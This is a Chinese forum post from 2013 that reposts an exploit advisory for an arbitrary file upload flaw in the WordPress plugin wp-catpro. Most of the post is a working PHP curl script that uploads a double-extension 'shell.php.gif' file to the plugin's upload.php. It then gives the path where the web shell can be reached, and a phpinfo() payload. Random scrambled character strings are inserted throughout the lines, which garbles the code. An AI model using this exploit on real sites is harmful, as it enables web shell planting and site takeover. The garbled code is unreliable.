找回密码
 立即注册
查看: 2892|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
! h" H( E9 [& h5 C( |/ `- A: c#-----------------------------------------------------------------------
0 S5 j5 F% \5 \9 [! u4 a 2 W" P) i* |0 B, e  Z- e
作者  => Zikou-16
0 `- G" p0 {& X$ p8 y邮箱 => zikou16x@gmail.com
3 \+ S* P0 p, o3 n* _测试系统 : Windows 7 , Backtrack 5r37 I4 D) J3 N7 n" B
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip& i  i* `3 X5 p0 R& e6 P6 g
####
/ ~+ `) H& Y( `8 o; `9 ^
. _. O9 I2 G+ i) o3 r#=> Exploit 信息:; {9 h3 P& y, Z
------------------
5 Q' e, ?2 r" z; V: c1 _5 `6 Y) f# 攻击者可以上传 file/shell.php.gif% c( [( M& ^: L0 n; Z% T6 L
# ("jpg", "gif", "png")  // Allowed file extensions8 z7 X% `" w1 U1 r
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)( K+ Y, w/ v' ?& a
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
* I) l+ V: Z" F7 y------------------
# W0 y7 Z2 z/ I) C$ i 1 A2 i" e' c( i0 |8 t- I2 w5 R1 x
#=> Exploit
) }; K- o8 Z" ]# w* ~& _, q3 R-----------. _2 P3 ?" y3 k% r5 F5 i: N3 l
<?php" [6 s- S. X% b5 y. i

& s. ^5 K, o- V1 }: _$uploadfile="zik.php.gif";9 N1 c7 ~: ~) o- l8 `/ t! q& `
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
( C8 ~* u8 F. [" lcurl_setopt($ch, CURLOPT_POST, true);
# K" |% ]" k. n/ S, l2 M  G- acurl_setopt($ch, CURLOPT_POSTFIELDS,
) {" O: H8 x* u9 Y8 W! F, ~array('Filedata'=>"@$uploadfile",
' Y% `! D7 i' T. r. S/ a! j'folder'=>'/wp-content/uploads/catpro/'));0 f4 P4 D0 Z/ o/ I' P" i' k
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);+ {6 ?/ ~$ c9 S: ^) L
$postResult = curl_exec($ch);
; [& z1 e+ `$ f4 n2 ocurl_close($ch);- R, ^$ D  p1 k$ R  h

' {7 v  U  u. g4 {& N  r; O/ nprint "$postResult";
6 Y6 x6 c* N. Z3 z - M; C4 U& a% n, M) Y
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
; r! s5 D0 g8 I  ?>
9 T1 _0 Q1 V9 }7 g5 \! ~0 ^3 i<?php
) |3 d& W3 o- M- A5 ]  Vphpinfo();+ c- I. j3 F. a) ?9 ^
?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表